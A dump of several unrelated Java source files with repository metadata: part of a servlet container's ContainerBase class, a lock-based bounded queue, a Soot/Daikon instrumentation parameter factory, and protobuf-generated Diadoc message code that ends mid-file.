unique"); mapper.setContainer((Container) this); // May throw IAE if (started && (mapper instanceof Lifecycle)) { try { ((Lifecycle) mapper).start(); } catch (LifecycleException e) { log("ContainerBase.addMapper: start: ", e); throw new IllegalStateException ("ContainerBase.addMapper: start: " + e); } } mappers.put(mapper.getProtocol(), mapper); if (mappers.size() == 1) this.mapper = mapper; else this.mapper = null; fireContainerEvent(ADD_MAPPER_EVENT, mapper); } } /** * Add a property change listener to this component. * * @param listener The listener to add */ public void addPropertyChangeListener(PropertyChangeListener listener) { support.addPropertyChangeListener(listener); } /** * Return the child Container, associated with this Container, with * the specified name (if any); otherwise, return <code>null</code> * * @param name Name of the child Container to be retrieved */ public Container findChild(String name) { if (name == null) return (null); synchronized (children) { // Required by post-start changes return ((Container) children.get(name)); } } /** * Return the set of children Containers associated with this Container. * If this Container has no children, a zero-length array is returned. */ public Container[] findChildren() { synchronized (children) { Container results[] = new Container[children.size()]; return ((Container[]) children.values().toArray(results)); } } /** * Return the set of container listeners associated with this Container. * If this Container has no registered container listeners, a zero-length * array is returned. */ public ContainerListener[] findContainerListeners() { synchronized (listeners) { ContainerListener[] results = new ContainerListener[listeners.size()]; return ((ContainerListener[]) listeners.toArray(results)); } } /** * Return the Mapper associated with the specified protocol, if there * is one. If there is only one defined Mapper, use it for all protocols. * If there is no matching Mapper, return <code>null</code>. * * @param protocol Protocol for which to find a Mapper */ public Mapper findMapper(String protocol) { if (mapper != null) return (mapper); else synchronized (mappers) { return ((Mapper) mappers.get(protocol)); } } /** * Return the set of Mappers associated with this Container. If this * Container has no Mappers, a zero-length array is returned. */ public Mapper[] findMappers() { synchronized (mappers) { Mapper results[] = new Mapper[mappers.size()]; return ((Mapper[]) mappers.values().toArray(results)); } } /** * Process the specified Request, to produce the corresponding Response, * by invoking the first Valve in our pipeline (if any), or the basic * Valve otherwise. * * @param request Request to be processed * @param response Response to be produced * * @exception IllegalStateException if neither a pipeline or a basic * Valve have been configured for this Container * @exception IOException if an input/output error occurred while * processing * @exception ServletException if a ServletException was thrown * while processing this request */ public void invoke(Request request, Response response) throws IOException, ServletException { pipeline.invoke(request, response); } /** * Return the child Container that should be used to process this Request, * based upon its characteristics. If no such child Container can be * identified, return <code>null</code> instead. * * @param request Request being processed * @param update Update the Request to reflect the mapping selection? */ public Container map(Request request, boolean update) { // Select the Mapper we will use Mapper mapper = findMapper(request.getRequest().getProtocol()); if (mapper == null) return (null); // Use this Mapper to perform this mapping return (mapper.map(request, update)); } /** * Remove an existing child Container from association with this parent * Container. * * @param child Existing child Container to be removed */ public void removeChild(Container child) { synchronized(children) { if (children.get(child.getName()) == null) return; children.remove(child.getName()); } if (started && (child instanceof Lifecycle)) { try { ((Lifecycle) child).stop(); } catch (LifecycleException e) { log("ContainerBase.removeChild: stop: ", e); } } fireContainerEvent(REMOVE_CHILD_EVENT, child); child.setParent(null); } /** * Remove a container event listener from this component. * * @param listener The listener to remove */ public void removeContainerListener(ContainerListener listener) { synchronized (listeners) { listeners.remove(listener); } } /** * Remove a Mapper associated with this Container, if any. * * @param mapper The Mapper to be removed */ public void removeMapper(Mapper mapper) { synchronized(mappers) { if (mappers.get(mapper.getProtocol()) == null) return; mappers.remove(mapper.getProtocol()); if (started && (mapper instanceof Lifecycle)) { try { ((Lifecycle) mapper).stop(); } catch (LifecycleException e) { log("ContainerBase.removeMapper: stop: ", e); throw new IllegalStateException ("ContainerBase.removeMapper: stop: " + e); } } if (mappers.size() != 1) this.mapper = null; else { Iterator values = mappers.values().iterator(); this.mapper = (Mapper) values.next(); } fireContainerEvent(REMOVE_MAPPER_EVENT, mapper); } } /** * Remove a property change listener from this component. * * @param listener The listener to remove */ public void removePropertyChangeListener(PropertyChangeListener listener) { support.removePropertyChangeListener(listener); } // ------------------------------------------------------ Lifecycle Methods /** * Add a lifecycle event listener to this component. * * @param listener The listener to add */ public void addLifecycleListener(LifecycleListener listener) { lifecycle.addLifecycleListener(listener); } /** * Get the lifecycle listeners associated with this lifecycle. If this * Lifecycle has no listeners registered, a zero-length array is returned. */ public LifecycleListener[] findLifecycleListeners() { return lifecycle.findLifecycleListeners(); } /** * Remove a lifecycle event listener from this component. * * @param listener The listener to remove */ public void removeLifecycleListener(LifecycleListener listener) { lifecycle.removeLifecycleListener(listener); } /** * Prepare for active use of the public methods of this Component. * * @exception LifecycleException if this component detects a fatal error * that prevents it from being started */ public synchronized void start() throws LifecycleException { // Validate and update our current component state if (started) throw new LifecycleException (sm.getString("containerBase.alreadyStarted", logName())); // Notify our interested LifecycleListeners lifecycle.fireLifecycleEvent(BEFORE_START_EVENT, null); addDefaultMapper(this.mapperClass); started = true; // Start our subordinate components, if any if ((loader != null) && (loader instanceof Lifecycle)) ((Lifecycle) loader).start(); if ((logger != null) && (logger instanceof Lifecycle)) ((Lifecycle) logger).start(); if ((manager != null) && (manager instanceof Lifecycle)) ((Lifecycle) manager).start(); if ((cluster != null) && (cluster instanceof Lifecycle)) ((Lifecycle) cluster).start(); if ((realm != null) && (realm instanceof Lifecycle)) ((Lifecycle) realm).start(); if ((resources != null) && (resources instanceof Lifecycle)) ((Lifecycle) resources).start(); // Start our Mappers, if any Mapper mappers[] = findMappers(); for (int i = 0; i < mappers.length; i++) { if (mappers[i] instanceof Lifecycle) ((Lifecycle) mappers[i]).start(); } // Start our child containers, if any Container children[] = findChildren(); for (int i = 0; i < children.length; i++) { if (children[i] instanceof Lifecycle) ((Lifecycle) children[i]).start(); } // Start the Valves in our pipeline (including the basic), if any if (pipeline instanceof Lifecycle) ((Lifecycle) pipeline).start(); // Notify our interested LifecycleListeners lifecycle.fireLifecycleEvent(START_EVENT, null); // Notify our interested LifecycleListeners lifecycle.fireLifecycleEvent(AFTER_START_EVENT, null); } /** * Gracefully shut down active use of the public methods of this Component. * * @exception LifecycleException if this component detects a fatal error * that needs to be reported */ public synchronized void stop() throws LifecycleException { // Validate and update our current component state if (!started) throw new LifecycleException (sm.getString("containerBase.notStarted", logName())); // Notify our interested LifecycleListeners lifecycle.fireLifecycleEvent(BEFORE_STOP_EVENT, null); // Notify our interested LifecycleListeners lifecycle.fireLifecycleEvent(STOP_EVENT, null); started = false; // Stop the Valves in our pipeline (including the basic), if any if (pipeline instanceof Lifecycle) { ((Lifecycle) pipeline).stop(); } // Stop our child containers, if any Container children[] = findChildren(); for (int i = 0; i < children.length; i++) { if (children[i] instanceof Lifecycle) ((Lifecycle) children[i]).stop(); } // Stop our Mappers, if any Mapper mappers[] = findMappers(); for (int i = 0; i < mappers.length; i++) { if (mappers[(mappers.length-1)-i] instanceof Lifecycle) ((Lifecycle) mappers[(mappers.length-1)-i]).stop(); } // Stop our subordinate components, if any if ((resources != null) && (resources instanceof Lifecycle)) { ((Lifecycle) resources).stop(); } if ((realm != null) && (realm instanceof Lifecycle)) { ((Lifecycle) realm).stop(); } if ((cluster != null) && (cluster instanceof Lifecycle)) { ((Lifecycle) cluster).stop(); } if ((manager != null) && (manager instanceof Lifecycle)) { ((Lifecycle) manager).stop(); } if ((logger != null) && (logger instanceof Lifecycle)) { ((Lifecycle) logger).stop(); } if ((loader != null) && (loader instanceof Lifecycle)) { ((Lifecycle) loader).stop(); } // Notify our interested LifecycleListeners lifecycle.fireLifecycleEvent(AFTER_STOP_EVENT, null); } // ------------------------------------------------------- Pipeline Methods /** * Add a new Valve to the end of the pipeline associated with this * Container. Prior to adding the Valve, the Valve's * <code>setContainer</code> method must be called, with this Container * as an argument. The method may throw an * <code>IllegalArgumentException</code> if this Valve chooses not to * be associated with this Container, or <code>IllegalStateException</code> * if it is already associated with a different Container. * * @param valve Valve to be added * * @exception IllegalArgumentException if this Container refused to * accept the specified Valve * @exception IllegalArgumentException if the specifie Valve refuses to be * associated with this Container * @exception IllegalStateException if the specified Valve is already * associated with a different Container */ public synchronized void addValve(Valve valve) { pipeline.addValve(valve); fireContainerEvent(ADD_VALVE_EVENT, valve); } /** * <p>Return the Valve instance that has been distinguished as the basic * Valve for this Pipeline (if any). */ public Valve getBasic() { return (pipeline.getBasic()); } /** * Return the set of Valves in the pipeline associated with this * Container, including the basic Valve (if any). If there are no * such Valves, a zero-length array is returned. */ public Valve[] getValves() { return (pipeline.getValves()); } /** * Remove the specified Valve from the pipeline associated with this * Container, if it is found; otherwise, do nothing. * * @param valve Valve to be removed */ public synchronized void removeValve(Valve valve) { pipeline.removeValve(valve); fireContainerEvent(REMOVE_VALVE_EVENT, valve); } /** * <p>Set the Valve instance that has been distinguished as the basic * Valve for this Pipeline (if any). Prioer to setting the basic Valve, * the Valve's <code>setContainer()</code> will be called, if it * implements <code>Contained</code>, with the owning Container as an * argument. The method may throw an <code>IllegalArgumentException</code> * if this Valve chooses not to be associated with this Container, or * <code>IllegalStateException</code> if it is already associated with * a different Container.</p> * * @param valve Valve to be distinguished as the basic Valve */ public void setBasic(Valve valve) { pipeline.setBasic(valve); } // ------------------------------------------------------ Protected Methods /** * Add a default Mapper implementation if none have been configured * explicitly. * * @param mapperClass Java class name of the default Mapper */ protected void addDefaultMapper(String mapperClass) { // Do we need a default Mapper? if (mapperClass == null) return; if (mappers.size() >= 1) return; // Instantiate and add a default Mapper try { Class clazz = Class.forName(mapperClass); Mapper mapper = (Mapper) clazz.newInstance(); mapper.setProtocol("http"); addMapper(mapper); } catch (Exception e) { log(sm.getString("containerBase.addDefaultMapper", mapperClass), e); } } /** * Notify all container event listeners that a particular event has * occurred for this Container. The default implementation performs * this notification synchronously using the calling thread. * * @param type Event type * @param data Event data */ public void fireContainerEvent(String type, Object data) { if (listeners.size() < 1) return; ContainerEvent event = new ContainerEvent(this, type, data); ContainerListener list[] = new ContainerListener[0]; synchronized (listeners) { list = (ContainerListener[]) listeners.toArray(list); } for (int i = 0; i < list.length; i++) ((ContainerListener) list[i]).containerEvent(event); } /** * Log the specified message to our current Logger (if any). * * @param message Message to be logged */ protected void log(String message) { Logger logger = getLogger(); if (logger != null) logger.log(logName() + ": " + message); else System.out.println(logName() + ": " + message); } /** * Log the specified message and exception to our current Logger * (if any). * * @param message Message to be logged * @param throwable Related exception */ protected void log(String message, Throwable throwable) { Logger logger = getLogger(); if (logger != null) logger.log(logName() + ": " + message, throwable); else { System.out.println(logName() + ": " + message + ": " + throwable); throwable.printStackTrace(System.out); } } /** * Return the abbreviated name of this container for logging messsages */ protected String logName() { String className = this.getClass().getName(); int period = className.lastIndexOf("."); if (period >= 0) className = className.substring(period + 1); return (className + "[" + getName() + "]"); } }
[ "renwu@kashuo.com" ]
renwu@kashuo.com
b4745b49d3353d11da048345a81d0b9a90618c97
7e4a8b733fa77048026f132f85624667ad3696c0
/src/main/java/com/zq/spring/MyQueue.java
38622d08d996283cf1e47d5cb3ef94ff8998a3e9
[]
no_license
zq1998/algorithm
76c8ffe05bf203237229dd01c82abcce6b08281f
250cca97f908d8878e293900a3ff02cd9a0bb493
refs/heads/master
2020-09-22T18:09:22.987551
2019-12-02T06:29:51
2019-12-02T06:29:51
225,295,865
0
0
null
null
null
null
UTF-8
Java
false
false
1,572
java
package com.zq.spring; import java.util.concurrent.locks.Condition; import java.util.concurrent.locks.Lock; import java.util.concurrent.locks.ReentrantLock; public class MyQueue<T>{ private Object[] elements; private Lock lock=new ReentrantLock(); private Condition notEmpty=lock.newCondition(); private Condition notFull=lock.newCondition(); private int length=0,addIndex=0,removeIndex=0; public MyQueue(int size){ elements=new Object[size]; } public void add(T object) { lock.lock(); try { while (length==elements.length){ notFull.await(); } elements[addIndex]=object; if(addIndex++ ==elements.length){ addIndex=0; } length++; notEmpty.signal(); } catch (InterruptedException e) { e.printStackTrace(); } finally { lock.unlock(); } } public T remove() throws InterruptedException{ lock.lock(); try { while (0 == length){ notEmpty.await(); } Object element=elements[removeIndex]; if(removeIndex++ == elements.length){ removeIndex=0; } length--; notFull.signal(); return (T)element; } catch (InterruptedException e) { e.printStackTrace(); } finally { lock.unlock(); } return null; } }
[ "zq1012872209@gmail.com" ]
zq1012872209@gmail.com
7d9c6e649bd8b2d2f5a5152540c7fd6e63aa8b09
c9f2bd34255a1f7822fe0fbf4c7e51fa26eede14
/java-project/src/main/java/ar/uba/dc/analysis/automaticinvariants/instrumentation/daikon/parameters/DIParameterFactory.java
816ba76c7f2e172c6d1336e4e5ac00f9a047f6d2
[]
no_license
billy-mosse/jconsume
eca93b696eaf8edcb8af5730eebd95f49e736fd4
b782a55f20c416a73c967b2225786677af5f52ba
refs/heads/master
2022-09-22T18:10:43.784966
2020-03-09T01:00:38
2020-03-09T01:00:38
97,016,318
4
0
null
2022-09-01T22:58:04
2017-07-12T14:18:01
C
UTF-8
Java
false
false
10,273
java
/* * Created on 06/01/2005 * * TODO To change the template for this generated file go to * Window - Preferences - Java - Code Style - Code Templates */ package ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters; import java.util.ArrayList; import java.util.Collection; import org.apache.commons.lang.StringUtils; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DIParameter; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Array; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Byte; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Collection; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Double; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Int; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Integer; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Long; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_Object; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_String; import ar.uba.dc.analysis.automaticinvariants.instrumentation.daikon.parameters.DI_ValueNull; import soot.Body; import soot.Local; import soot.Scene; import soot.SootClass; import soot.Type; import soot.Value; /** * @author Diego * * TODO To change the template for this generated type comment go to * Window - Preferences - Java - Code Style - Code Templates */ public class DIParameterFactory { /** * */ //En realidad aca esta la papota public static DIParameter createDIParameter(Local var, Collection filter, Body body, boolean recursive) { if(isCollection(var)) return new DI_Collection(var); else if(isString(var)) return new DI_String(var); else if(isArray(var)) return new DI_Array(var); else if(isDouble(var)) return new DI_Double(var); else if(isLong(var)) return new DI_Long(var); else if(isByte(var)) return new DI_Byte(var); else if(isNum(var)) return new DI_Int(var); else if(isInteger(var)) return new DI_Integer(var); // else if(isIterator(var)) // return new DI_Iterator(var); else if(isObject(var) && recursive) { SootClass c = Scene.v().getSootClass(var.getType().toString()); return new DI_Object(var, c, body, filter); } return null; } public static DIParameter createDIParameter2(Local var, Collection filter, Body body, boolean recursive) { if(isCollection(var)) return new DI_Collection(var, true); else if(isString(var)) return new DI_String(var); else if(isArray(var)) return new DI_Array(var); else if(isDouble(var)) return new DI_Double(var); else if(isLong(var)) return new DI_Long(var); else if(isByte(var)) return new DI_Byte(var); else if(isNum(var)) return new DI_Int(var); else if(isInteger(var)) return new DI_Integer(var); // else if(isIterator(var)) // return new DI_Iterator(var); else if(isObject(var) && recursive) { SootClass c = Scene.v().getSootClass(var.getType().toString()); return new DI_Object(var, c, body, filter, true); } return null; } public static DIParameter createDIParameter(String vn, Type t, Collection filter, Body body, boolean recursive) { if(isTypeCollection(t)) return new DI_Collection(vn, t); else if(isTypeString(t)) return new DI_String(vn, t); else if(isTypeArray(t)) return new DI_Array(vn, t); else if(t.toString().equals("double")) return new DI_Double(vn); else if(t.toString().equals("long")) return new DI_Long(vn); else if(t.toString().equals("byte")) return new DI_Byte(vn); else if(t.toString().equals("int")) return new DI_Int(vn); else if(t.toString().equals("java.lang.Integer")) return new DI_Integer(vn, t); else if(isTypeObject(t) && recursive) { SootClass c = Scene.v().getSootClass(t.toString()); return new DI_Object(vn,t,c, body, filter); } return null; } public static DIParameter createDIParameter(Local var, Body body, boolean recursive) { if(isCollection(var)) return new DI_Collection(var); else if(isString(var)) return new DI_String(var); else if(isArray(var)) return new DI_Array(var); else if(isDouble(var)) return new DI_Double(var); else if(isLong(var)) return new DI_Long(var); else if(isByte(var)) return new DI_Byte(var); else if(isNum(var)) return new DI_Int(var); else if(isInteger(var)) return new DI_Integer(var); // else if(isIterator(var)) // return new DI_Iterator(var); else if(isObject(var) && recursive) { SootClass c = Scene.v().getSootClass(var.getType().toString()); return new DI_Object(var, c, body); } return null; } public static DIParameter createDIParameter(String vn, Type t, Body body, boolean recursive) { if(isTypeCollection(t)) return new DI_Collection(vn, t); else if(isTypeString(t)) return new DI_String(vn, t); else if(isTypeArray(t)) return new DI_Array(vn, t); else if(t.toString().equals("double")) return new DI_Double(vn); else if(t.toString().equals("long")) return new DI_Long(vn); else if(t.toString().equals("byte")) return new DI_Byte(vn); else if(t.toString().equals("int")) return new DI_Int(vn); else if(t.toString().equals("java.lang.Integer")) return new DI_Integer(vn, t); else if(isTypeObject(t) && recursive) { SootClass c = Scene.v().getSootClass(t.toString()); return new DI_Object(vn,t,c, body); } return null; } public static DIParameter createDIParameter(Local var) { if(isCollection(var)) return new DI_Collection(var); else if(isString(var)) return new DI_String(var); else if(isArray(var)) return new DI_Array(var); else if(isDouble(var)) return new DI_Double(var); else if(isLong(var)) return new DI_Long(var); else if(isByte(var)) return new DI_Byte(var); else if(isNum(var)) return new DI_Int(var); else if(isInteger(var)) return new DI_Integer(var); return null; } public static DIParameter createDIParameter(String vn, Type t) { if(isTypeCollection(t)) return new DI_Collection(vn, t); else if(isTypeString(t)) return new DI_String(vn, t); else if(isTypeArray(t)) return new DI_Array(vn, t); else if(t.toString().equals("double")) return new DI_Double(vn); else if(t.toString().equals("long")) return new DI_Long(vn); else if(t.toString().equals("byte")) return new DI_Byte(vn); else if(t.toString().equals("int")) return new DI_Int(vn); else if(t.toString().equals("java.lang.Integer")) return new DI_Integer(vn, t); else if(t.toString().equals("null_type")) return DI_ValueNull.nullLocal; return null; } protected static boolean isArray(Value var) { return isTypeArray(var.getType()); } protected static boolean isCollection(Value var) { return isTypeCollection(var.getType()); } protected static boolean isObject(Value var) { return isTypeObject(var.getType()); } protected static boolean isSizeable(Value v) { return isCollection(v) || isString(v) || isArray(v); } protected static boolean isString(Value var) { return isTypeString(var.getType()); } public static boolean isTypeArray(Type t) { boolean ok = false; if (t.toString().endsWith("[]")) ok = true; return ok; } protected static boolean isTypeCollection(Type t) { boolean ok = false; try { Class c = Class.forName(t.toString()); if (Collection.class.isAssignableFrom(c)) { ok = true; } } catch (ClassNotFoundException e) { } return ok; } protected static boolean isTypeObject(Type t) { boolean ok = false; /* if(!t.toString().startsWith("java.")) { */ try { Class c = Class.forName(t.toString()); if (Object.class.isAssignableFrom(c)) { ok = true; } } catch (ClassNotFoundException e) { ok=false; } // } return ok; } protected static boolean isTypeString(Type t) { boolean ok = false; if (t.toString().endsWith(".String")) ok = true; return ok; } protected static boolean isDouble(Value v) { return v.getType().toString().equals("double") ; } protected static boolean isLong(Value v) { return v.getType().toString().equals("long"); } protected static boolean isByte(Value v) { return v.getType().toString().equals("byte"); } protected static boolean isNum(Value v) { return isTypeNum(v.getType().toString()); } protected static boolean isInteger(Value v) { return isTypeInteger(v.getType().toString()); } protected static boolean isTypeNum(String t) { return t.equals("int"); /*|| t.equals("long")*/ } protected static boolean isTypeNum2(String t) { return t.equals("int") || t.equals("long"); } protected static boolean isTypeInteger(String t) { return t.equals("java.lang.Integer"); } public static boolean isIterator(Value var) { return isTypeIterator(var.getType()); } protected static boolean isTypeIterator(Type t) { return t.toString().equals("java.util.Iterator"); } //importable = that can (and needs to) be imported for it to be used //returns empty when it's local or non importable /** * This method is used to correctly write the InstrumentedMethod classes * @param classname * @return all the internal collaborators of the class that should be imported in order to use it */ public static ArrayList<String> getImportables(String classname) { ArrayList<String> imp = new ArrayList<String>(); if(isTypeInteger(classname) || classname.endsWith(".String") || classname.equals("double") || isTypeNum2(classname) || classname.startsWith("java.lang")) return imp; if(classname.contains("[]")) { classname = classname.substring(0,classname.indexOf("[]")); imp.addAll(getImportables(classname)); return imp; } if(classname.contains("<") && classname.contains(">")) { String s = StringUtils.substringBetween(classname, "<", ">"); String[] classnames = s.split(","); for(String c : classnames) { imp.addAll(getImportables(c)); } return imp; } imp.add(classname); return imp; } }
[ "billy.mosse@gmail.com" ]
billy.mosse@gmail.com
782868071c99b83a4400940c0313c59c3da6fa2a
43a46a505f957b6dc18d9de22348eaa421c1a51e
/src/main/java/Diadoc/Api/Proto/Documents/DocumentProtocolProtos.java
86d49e7f3b6c35ce875676b0610bd7a1a8ac19ed
[ "MIT" ]
permissive
diadoc/diadocsdk-java
ac3dc8d5951ed0c900489be11248b72ff3b7775b
9f71a926b1ddbc573312d2e5e33220511eb2267e
refs/heads/master
2023-08-31T17:49:22.651768
2023-08-09T08:35:48
2023-08-09T08:35:48
60,083,113
14
50
MIT
2023-09-13T11:06:05
2016-05-31T11:17:06
Java
UTF-8
Java
false
true
20,691
java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: Documents/DocumentProtocol.proto package Diadoc.Api.Proto.Documents; public final class DocumentProtocolProtos { private DocumentProtocolProtos() {} public static void registerAllExtensions( com.google.protobuf.ExtensionRegistry registry) { } public interface DocumentProtocolOrBuilder extends // @@protoc_insertion_point(interface_extends:Diadoc.Api.Proto.Documents.DocumentProtocol) com.google.protobuf.MessageOrBuilder { /** * <code>required bytes PrintForm = 1;</code> */ boolean hasPrintForm(); /** * <code>required bytes PrintForm = 1;</code> */ com.google.protobuf.ByteString getPrintForm(); /** * <code>required bytes Signature = 2;</code> */ boolean hasSignature(); /** * <code>required bytes Signature = 2;</code> */ com.google.protobuf.ByteString getSignature(); } /** * Protobuf type {@code Diadoc.Api.Proto.Documents.DocumentProtocol} */ public static final class DocumentProtocol extends com.google.protobuf.GeneratedMessage implements // @@protoc_insertion_point(message_implements:Diadoc.Api.Proto.Documents.DocumentProtocol) DocumentProtocolOrBuilder { // Use DocumentProtocol.newBuilder() to construct. private DocumentProtocol(com.google.protobuf.GeneratedMessage.Builder<?> builder) { super(builder); this.unknownFields = builder.getUnknownFields(); } private DocumentProtocol(boolean noInit) { this.unknownFields = com.google.protobuf.UnknownFieldSet.getDefaultInstance(); } private static final DocumentProtocol defaultInstance; public static DocumentProtocol getDefaultInstance() { return defaultInstance; } public DocumentProtocol getDefaultInstanceForType() { return defaultInstance; } private final com.google.protobuf.UnknownFieldSet unknownFields; @java.lang.Override public final com.google.protobuf.UnknownFieldSet getUnknownFields() { return this.unknownFields; } private DocumentProtocol( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { initFields(); int mutable_bitField0_ = 0; com.google.protobuf.UnknownFieldSet.Builder unknownFields = com.google.protobuf.UnknownFieldSet.newBuilder(); try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; default: { if (!parseUnknownField(input, unknownFields, extensionRegistry, tag)) { done = true; } break; } case 10: { bitField0_ |= 0x00000001; printForm_ = input.readBytes(); break; } case 18: { bitField0_ |= 0x00000002; signature_ = input.readBytes(); break; } } } } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(this); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException( e.getMessage()).setUnfinishedMessage(this); } finally { this.unknownFields = unknownFields.build(); makeExtensionsImmutable(); } } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return Diadoc.Api.Proto.Documents.DocumentProtocolProtos.internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_descriptor; } protected com.google.protobuf.GeneratedMessage.FieldAccessorTable internalGetFieldAccessorTable() { return Diadoc.Api.Proto.Documents.DocumentProtocolProtos.internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_fieldAccessorTable .ensureFieldAccessorsInitialized( Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol.class, Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol.Builder.class); } public static com.google.protobuf.Parser<DocumentProtocol> PARSER = new com.google.protobuf.AbstractParser<DocumentProtocol>() { public DocumentProtocol parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return new DocumentProtocol(input, extensionRegistry); } }; @java.lang.Override public com.google.protobuf.Parser<DocumentProtocol> getParserForType() { return PARSER; } private int bitField0_; public static final int PRINTFORM_FIELD_NUMBER = 1; private com.google.protobuf.ByteString printForm_; /** * <code>required bytes PrintForm = 1;</code> */ public boolean hasPrintForm() { return ((bitField0_ & 0x00000001) == 0x00000001); } /** * <code>required bytes PrintForm = 1;</code> */ public com.google.protobuf.ByteString getPrintForm() { return printForm_; } public static final int SIGNATURE_FIELD_NUMBER = 2; private com.google.protobuf.ByteString signature_; /** * <code>required bytes Signature = 2;</code> */ public boolean hasSignature() { return ((bitField0_ & 0x00000002) == 0x00000002); } /** * <code>required bytes Signature = 2;</code> */ public com.google.protobuf.ByteString getSignature() { return signature_; } private void initFields() { printForm_ = com.google.protobuf.ByteString.EMPTY; signature_ = com.google.protobuf.ByteString.EMPTY; } private byte memoizedIsInitialized = -1; public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; if (!hasPrintForm()) { memoizedIsInitialized = 0; return false; } if (!hasSignature()) { memoizedIsInitialized = 0; return false; } memoizedIsInitialized = 1; return true; } public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { getSerializedSize(); if (((bitField0_ & 0x00000001) == 0x00000001)) { output.writeBytes(1, printForm_); } if (((bitField0_ & 0x00000002) == 0x00000002)) { output.writeBytes(2, signature_); } getUnknownFields().writeTo(output); } private int memoizedSerializedSize = -1; public int getSerializedSize() { int size = memoizedSerializedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) == 0x00000001)) { size += com.google.protobuf.CodedOutputStream .computeBytesSize(1, printForm_); } if (((bitField0_ & 0x00000002) == 0x00000002)) { size += com.google.protobuf.CodedOutputStream .computeBytesSize(2, signature_); } size += getUnknownFields().getSerializedSize(); memoizedSerializedSize = size; return size; } private static final long serialVersionUID = 0L; @java.lang.Override protected java.lang.Object writeReplace() throws java.io.ObjectStreamException { return super.writeReplace(); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom(java.io.InputStream input) throws java.io.IOException { return PARSER.parseFrom(input); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return PARSER.parseFrom(input, extensionRegistry); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return PARSER.parseDelimitedFrom(input); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return PARSER.parseDelimitedFrom(input, extensionRegistry); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return PARSER.parseFrom(input); } public static Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return PARSER.parseFrom(input, extensionRegistry); } public static Builder newBuilder() { return Builder.create(); } public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder(Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocol prototype) { return newBuilder().mergeFrom(prototype); } public Builder toBuilder() { return newBuilder(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessage.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * Protobuf type {@code Diadoc.Api.Proto.Documents.DocumentProtocol} */ public static final class Builder extends com.google.protobuf.GeneratedMessage.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:Diadoc.Api.Proto.Documents.DocumentProtocol) Diadoc.Api.Proto.Documents.DocumentProtocolProtos.DocumentProtocolOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return Diadoc.Api.Proto.Documents.DocumentProtocolProtos.internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_descriptor; } protected com.google.protobuf.GeneratedMessage.FieldAccessorTable internalGetFieldAccessorTable() { return Diadoc.Api.Proto.Documents.DocumentProtocolProtos.internal_static_Diadoc_Api_Proto_Documents_DocumentProtocol_fieldAccessorTable .ensureFieldAccessorsInitialized( 